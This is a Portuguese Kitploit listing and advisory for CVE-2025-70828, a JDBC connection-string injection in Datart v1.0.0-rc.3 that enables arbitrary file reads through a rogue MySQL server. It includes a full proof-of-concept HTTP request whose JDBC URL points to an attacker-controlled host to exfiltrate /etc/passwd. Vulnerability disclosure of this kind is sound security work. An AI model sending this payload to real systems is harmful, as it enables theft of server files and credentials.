Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-70828 — Datart v1.0.0-rc.3 — Injeção de String de Conexão JDBC levando à Leitura Arbitrária de Arquivos | Kitploit
Ferramentas/GitHubGitHub/xiaoxiaoranxxx/cve-2025-70828
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoSegurança de Banco de Dados
GitHubxiaoxiaoranxxx/cve-2025-70828

CVE-2025-70828

Datart v1.0.0-rc.3 — Injeção de String de Conexão JDBC levando à Leitura Arbitrária de Arquivos

Ver Repositório
4há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-70828

Resumo

Uma vulnerabilidade de leitura arbitrária de arquivos foi descoberta no Datart v1.0.0-rc.3. O aplicativo falha ao validar adequadamente a URL de conexão JDBC durante a configuração da fonte de dados.

Detalhes da Vulnerabilidade

Tipo de Vulnerabilidade: Validação de Entrada Incorreta (CWE-20) / Leitura Arbitrária de Arquivos Versão Afetada: Datart v1.0.0-rc.3 Severidade: Alta (Potencial para divulgação de informações sensíveis)

Descrição

A vulnerabilidade existe no módulo de configuração da fonte de dados. O aplicativo não sanitiza estritamente o parâmetro url na configuração JDBC. Um atacante remoto com privilégios para configurar fontes de dados pode injetar parâmetros maliciosos (especificamente allowLoadLocalInfile=true) na URL JDBC.

Ao apontar a conexão JDBC para um servidor MySQL malicioso controlado pelo atacante (Rogue MySQL Server), o atacante pode fazer com que o cliente envie arquivos locais do servidor Datart para o servidor do atacante.

Impacto

A exploração bem-sucedida permite que um atacante autenticado leia arquivos arbitrários do sistema de arquivos do servidor (por exemplo, , arquivos de configuração, código-fonte), levando potencialmente ao comprometimento do servidor ou a novos ataques.

/etc/passwd

Prova de Conceito (PoC)

  1. Configuração: O atacante configura um servidor MySQL malicioso capaz de explorar o recurso LOAD DATA LOCAL INFILE (por exemplo, usando ferramentas como rogue_mysql_server).
  2. Exploração: O atacante envia a seguinte solicitação para o servidor Datart para testar a conexão:
root@kitploit:~
POST /api/v1/data-provider/test HTTP/1.1
Host: {{TARGET_HOST}}
Content-Type: application/json
Authorization: Bearer {{VALID_JWT_TOKEN}}
Accept: application/json

{
  "name": "cve-poc-test",
  "type": "JDBC",
  "properties": {
    "dbType": "MYSQL",
    "url": "jdbc:mysql://{{ATTACKER_IP}}:{{ATTACKER_PORT}}/test?allowLoadLocalInfile=true&allowUrlInLocalInfile=true&maxAllowedPacket=655360",
    "user": "fileread_/etc/passwd",
    "password": "any_password",
    "driverClass": "com.mysql.cj.jdbc.Driver",
    "serverAggregate": false,
    "enableSpecialSQL": false,
    "enableSyncSchemas": true,
    "syncInterval": "60",
    "properties": {}
  }
}
Baixar ferramenta